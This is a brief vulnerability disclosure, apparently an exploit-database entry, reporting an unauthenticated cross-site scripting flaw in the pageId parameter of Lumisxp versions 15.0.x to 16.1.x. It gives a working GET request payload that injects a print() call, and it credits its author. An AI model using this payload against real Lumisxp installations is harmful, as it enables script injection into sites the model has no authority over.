Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the pageId parameter.
-
Payload:
GET /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa
Author: Rodolfo Tavares